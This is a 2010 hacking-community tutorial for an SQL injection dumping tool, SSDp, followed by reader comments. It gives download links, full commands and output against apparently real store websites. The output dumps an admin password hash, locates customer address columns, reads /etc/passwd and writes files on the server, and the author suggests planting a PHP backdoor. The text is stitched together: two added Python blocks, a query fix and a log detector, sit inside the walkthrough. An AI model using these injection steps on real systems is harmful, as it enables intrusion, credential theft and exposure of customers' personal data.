Binus Hacker - Independent Hacking Community

Simple SQL Dumper V.5.1

15 August 2010
Author:   · Article category: Tutorial



[o] attention

USE THIS TOOL FOR EDUCATIONAL PURPOSES ONLY.
WE ARE NOT RESPONSIBLE FOR ANY DAMAGE OR IMPROPER USE OF THIS TOOL.
USE IT AT YOUR OWN RISK!!

[o] what is SSDp?

SSDp is a useful penetration testing tool for finding bugs, errors or vulnerabilities in MySQL databases.

[o] download SSDp v5.1

http://okedeh.co.tv/ssdp51.tar.gz

http://pacenoge.org/tool/ssdp51.tar.gz

[o] function

- SQL Injection
- Operating System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column

[o] command and option

[root@evilc0de noge]# perl ssdp.pl -h

|-----------------------------------------------------------------------------|
| Usage: perl ssdp.pl [options] |
| |
| -u [SQLi URL] target with id parameter or sqli url with c0li string |
| -e [sqli end tag] sql injection end tag (default: "--") |
| -d [database name] this option should not be used (default: @@database) |
| -t [table name] table_name |
| -c [columns name] column_name (example: id,user,pass,email) |
| -s [space code] SPACE code: +,/**/,%20 (default: "+") |
| -f [max field] max field to get magic number (default: 123) |
| -start [num] row number to begin dumping data |
| -stop [num] row number to stop dumping |
| -where [query] your special dumping query |
| |
| -info Get MySQL Information [MySQL v4+] |
| -dbase Concat Databases [MySQL v5+] |
| -table Concat Tables [MySQL v5+] |
| -column Concat Columns [MySQL v5+] |
| -tabcol Concat Tables with Columns [MySQL v5+] |
| -find Search Columns Name [MySQL v5+] |
| -magic Find Magic Number [MySQL v4+] |
| -dump Dump Data [MySQL v4+] |
| -brute Fuzzing Tables & Columns [MySQL v4+] |
| |
| -log [file name] file name to save ssdp data (default: ssdp.log) |
| -p [http proxy] hostname:port |
|-----------------------------------------------------------------------------|

[o] proof of concept

[0x01] magic number (null column).

first of all we have to find the null column (magic number).
the null column is used to execute our SQL query.

# perl ssdp.pl -u [target URL] -magic

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2 -magic

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] URL: http://www.460productions.com/store.php?cat=2
[+] End Tag: --

Attempting to find the magic number…

[+] Testing: 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,

[+] Field Length : 24
[+] Magic Number : 1
[+] URL Injection: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24

Showing MySQL Information …

[+] Database: 460store
[+] User: i460usr@boscgi1002.eigbox.net
[+] Version: 5.0.51a-log
[+] System: redhat-linux-gnu
[+] Access to "mysql" Database: No
[+] Read File "/etc/passwd": Yes (w00t)
[+] Create File "/tmp/c0li-430.txt": Yes (w00t)

Done.

our magic number is 1 and it will be replaced with the “c0li” string.
we can see the database information and the operating system too.
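
Why the "AND 1=2 UNION ALL SELECT" request in [0x01] returns attacker-chosen rows, and the fix on the application side, as an added example (not part of the original tutorial or of SSDp). It assumes a constructed in-memory SQLite database standing in for the MySQL store database; the table contents and function names are hypothetical.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the store database; every row is made up."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE product  (id INTEGER, name TEXT, cat INTEGER);
        CREATE TABLE security (user_id INTEGER, username TEXT, password TEXT);
        INSERT INTO product  VALUES (1, 'Widget', 2), (2, 'Gadget', 3);
        INSERT INTO security VALUES (1, 'admin', 'constructed-hash');
    """)
    return db


def products_vulnerable(db, cat):
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so anything after the number is parsed as SQL by the database.
    sql = "SELECT id, name FROM product WHERE cat = " + cat
    return db.execute(sql).fetchall()


def products_hardened(db, cat):
    # 1. Validate the type the application expects (a plain integer).
    if not (cat.isascii() and cat.isdigit()):
        raise ValueError("cat must be a non-negative integer")
    # 2. Bind the value as a parameter, so it is always data and never SQL.
    return db.execute(
        "SELECT id, name FROM product WHERE cat = ?", (int(cat),)
    ).fetchall()


# Same shape as the tutorial's request: "AND 1=2" removes the legitimate rows,
# so the page shows only what the appended UNION returns.
INJECTED = "2 AND 1=2 UNION ALL SELECT username, password FROM security"

if __name__ == "__main__":
    db = make_db()
    print("normal    :", products_vulnerable(db, "2"))
    print("injected  :", products_vulnerable(db, INJECTED))
    print("hardened  :", products_hardened(db, "2"))
    try:
        products_hardened(db, INJECTED)
    except ValueError as exc:
        print("rejected  :", exc)
```

The same two steps apply to the PHP/MySQL page in the walkthrough: cast or validate the numeric parameter, and use a prepared statement instead of string concatenation.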

[0x02] finding table

now we use the URL that includes the “c0li” string to find tables & columns.

# perl ssdp.pl -u [c0li URL] -table

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -table

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Number of Tables: 18

Showing tables …

[1] aspect_ratio(2)
[2] audio_format(3)
[3] category(7)
[4] customer(200)
[5] deposit(11)
[6] discount_group(9)
[7] discount_group_price(10)
[8] order()
[9] order_item(261)
[10] order_source(5)
[11] order_status(4)
[12] order_type(2)
[13] payment_type(4)
[14] product(30)
[15] product_group(17)
[16] security(1)
[17] shopping_cart(0)
[18] user_session(68)

Done.

that is the list of all tables in database()

[0x03] finding column

let’s see the columns of the table called “security”.

# perl ssdp.pl -u [c0li URL] -t [table] -column

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -column

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: database()
[+] Table Name: security
[+] Number of Columns: 5

Showing columns from table "security" …

[+] security(1): user_id,username,password,admin,last_login

Done.

aha! we got columns called “username” and “password”.

[0x04] dumping data

now we’ll see the information inside those columns.. :)

# perl ssdp.pl -u [c0li URL] -t [table] -c [column],[column] -dump

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -t security -c username,password -dump

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --

[+] Database Name: database()
[+] Table Name: security
[+] Column Name: username,password
[+] Data Count: 1

Dumping Data …

[1] admin : 2ec20101734c754d

Done.

we got the admin username and password hash. :D
ok, i have shown you how to find the magic number, tables and columns, and how to dump column data using SSDp.

[0x05] search column name (-find)

now i’ll show you how to use the -find option (Search Columns Name).
i’ll search for columns with the keyword “address”; it requires the -c option (column).

# perl ssdp.pl -u [c0li URL] -d [database name] -c [keyword] -find

[root@evilc0de noge]# perl ssdp.pl -u http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -d 460store -c address -find

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
[+] SQLi End Tag: --
[+] Database Name: 460store
[+] Column Name string to search: address

Searching for Columns Path …

[+] Columns Found:

[1] 460store.customer.email_address
[2] 460store.customer.address_line1
[3] 460store.customer.address_line2
[4] 460store.customer.address_city
[5] 460store.customer.address_state
[6] 460store.customer.address_zip
[7] 460store.customer.address_country
[8] 460store.customer.address_name

Done.

found columns containing the word “address” in table “customer”. easy right? :p

[0x06] read & create file (read only)

now let’s look at Read File (read only) & Create File (read only).
why read only? because this function is designed just to test whether we can read a file or not. to inject, we do it manually.. :(
as you saw the first time we looked for the magic number, the output contains these lines.

[+] Read File "/etc/passwd" : Yes (w00t)
[+] Create File "/tmp/c0li-159.txt" : Yes (w00t)

it means we can read (load_file) the /etc/passwd file on the target and we can also create files in the /tmp directory.
both depend on the MySQL account used by the application holding the FILE privilege, and on secure_file_priv not restricting the path.
to use load_file you need to convert /etc/passwd into hexadecimal. http://pacenoge.org/encdec

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f6574632f706173737764),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

the result will be like this.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh

let’s create a file in the /tmp directory. :)

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,"Simple SQLi Dumper",8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+into+outfile+"/tmp/ssdp.txt"--

the URL above means we write “Simple SQLi Dumper” into ssdp.txt, located in the /tmp directory.
to see whether it worked, let’s read /tmp/ssdp.txt using the load_file function. don’t forget to convert it first.

http://www.460productions.com/store.php?cat=2+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,load_file(0x2f746d702f737364702e747874),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

and you will see result like this.

1 2 3 4 5 6 Simple SQLi Dumper 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24

that is the text we wrote to /tmp/ssdp.txt.
what can we do with the create file vuln? we can create a php file as a backdoor on the target if we know the directory path. :) )
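
How the requests shown in [0x01] to [0x06] look from the server side, as an added example (not part of the original tutorial or of SSDp): a small access-log scanner that normalises the three space codes listed under -s (+, /**/, %20), flags the UNION, load_file and outfile patterns, and decodes hex load_file arguments back to file paths. The log lines, host paths and client addresses are constructed, and the rule names are hypothetical.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (documentation IP ranges); not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [21/Mar/2010:19:30:01 +0000] "GET /store.php?cat=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [21/Mar/2010:19:30:05 +0000] "GET /store.php?cat=2+AND+1=2+UNION+ALL+SELECT+c0li,2,3,4 HTTP/1.1" 200 812',
    '203.0.113.7 - - [21/Mar/2010:19:30:09 +0000] "GET /store.php?cat=2/**/AND/**/1=2/**/UNION/**/ALL/**/SELECT/**/1,2,load_file(0x2f6574632f706173737764),4-- HTTP/1.1" 200 1400',
    '203.0.113.7 - - [21/Mar/2010:19:30:12 +0000] "GET /store.php?cat=2%20AND%201=2%20UNION%20ALL%20SELECT%201,2,%22x%22,4%20into%20outfile%20%22/tmp/ssdp.txt%22-- HTTP/1.1" 200 790',
    '198.51.100.20 - - [21/Mar/2010:19:31:00 +0000] "GET /search.php?q=union+station HTTP/1.1" 200 2210',
]

REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

RULES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "false_condition": re.compile(r"\band\s+1\s*=\s*2\b", re.I),
    # "c0li" is the placeholder shown in the walkthrough's URLs and test file
    # name; that the tool sends it verbatim in requests is an assumption.
    "c0li_marker": re.compile(r"\bc0li\b", re.I),
    "load_file": re.compile(r"\bload_file\s*\(", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
}
HEX_ARG = re.compile(r"load_file\s*\(\s*0x([0-9a-f]+)\s*\)", re.I)


def normalize(target):
    """Undo the space codes (+, %20, /**/) so one rule set covers all of them."""
    query = target.partition("?")[2]
    text = unquote_plus(query)                # '+' and %xx decoding
    text = re.sub(r"/\*.*?\*/", " ", text)    # inline SQL comments used as spaces
    return re.sub(r"\s+", " ", text)


def decode_load_file_paths(text):
    """Turn load_file(0x...) arguments back into the file paths requested."""
    paths = []
    for hexstr in HEX_ARG.findall(text):
        if len(hexstr) % 2 == 0:
            paths.append(bytes.fromhex(hexstr).decode("latin-1"))
    return paths


def scan(lines):
    findings = []
    for line in lines:
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        text = normalize(target)
        hits = sorted(name for name, rx in RULES.items() if rx.search(text))
        if hits:
            findings.append({
                "client": client,
                "path": target.partition("?")[0],
                "rules": hits,
                "files": decode_load_file_paths(text),
            })
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A load_file or into_outfile hit that returned HTTP 200 is worth treating as a possible file read or write on the database host, not just a probe.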

[0x07] brute MySQL v4

guessing tables & columns for MySQL v4.
you can add your own table names & column names by editing the files called tables.dict & columns.dict.

# perl ssdp.pl -u [c0li URL] -brute

[root@evilc0de noge]# perl ssdp.pl -u http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33 -brute

[o]=================================================[x]
| Simple SQLi Dumper v5.1 |
| Coded by Vrs-hCk |
[o]=================================================[o]
Date : Sun Mar 21 19:31:42 2010
Help Command: -h, -help, --help

[+] c0li SQLi URL: http://www.samra.com/product_details.php?product_id=322+AND+1=2+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,c0li,33
[+] SQLi End Tag: --
Finding Tables & Columns …

[1] admin_user: username,password,email,adminid,adminname,phone,

Done.

found table “admin_user”
found column “username” “password” “email” “adminid” “adminname” “phone”

[0x08] conclusion

by using SSDp, it’s very easy to find a SQL injection vulnerability in a vulnerable parameter or string.
this tool also performs SQL injection tests against the vulnerable website and tries to dump data from the MySQL database.
you can dump data from MySQL database columns and it works nicely.
you can gather secret and confidential data such as usernames, passwords, credit card numbers, etc.
but i suggest using this tool in the right way. okay dude?? :p

[0x09] references

perl ssdp.pl -h

http://en.wikipedia.org/wiki/SQL_injection

http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

[0x10] greetz ^^

SSDp coded by Vrs-hCk ( ander[at]antisecurity[dot]org )
SSDp How To by NoGe ( mario[at]antisecurity[dot]org )

Vrs-hCk OoN_Boy paman zxvf angel stardustmemory
s4va xr00tb0y S3T4N pizzyroot matthews martfella

Comments

7 Comments on “Simple SQL Dumper V.5.1”

  1. free pc games on 1 September 2010 7:02 am

    awesome, bro

  2. brose on 10 September 2010 8:27 am

    bro, I want to ask.. between sql dumper v.5.1 and schemafuzz.. which one is roughly the more accurate?

  3. herbet on 18 September 2010 7:57 pm

    how does this work??
    confused!!

  4. NoGe on 19 September 2010 12:58 am

    wow…
    the tutorial made it all the way here too, huh.. hehehe.. :) )

  5. Simple SQL Dumper V.5.1 | awangn6600.co.cc on 22 October 2010 6:51 pm

    [...] From : Binus Hacker Original Source : Simple SQL Dumper V.5.1 This entry was posted in Computer, Hacking. Bookmark the permalink. ← Hack Photo Private [...]

  6. StarboyZ on 18 December 2010 7:00 pm


    this one was translated by google, you know.. hehehehe…

  7. entah on 30 December 2010 3:31 am

    why am I getting an error like this, bro …..
    [entah@sec ssdp51]$ perl ssdp.pl -h
    Can't locate HTTP/Request.pm in @INC (@INC contains: /usr/local/lib/perl5 /usr/local/share/perl5 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl5 /usr/share/perl5 /usr/local/lib/perl5/site_perl/5.10.0/i386-linux-thread-multi /usr/local/lib/perl5/site_perl/5.10.0 /usr/lib/perl5/vendor_perl/5.10.0/i386-linux-thread-multi /usr/lib/perl5/vendor_perl /usr/lib/perl5/site_perl .) at ssdp.pl line 12.
    BEGIN failed--compilation aborted at ssdp.pl line 12.

    I'm confused…
    please enlighten me
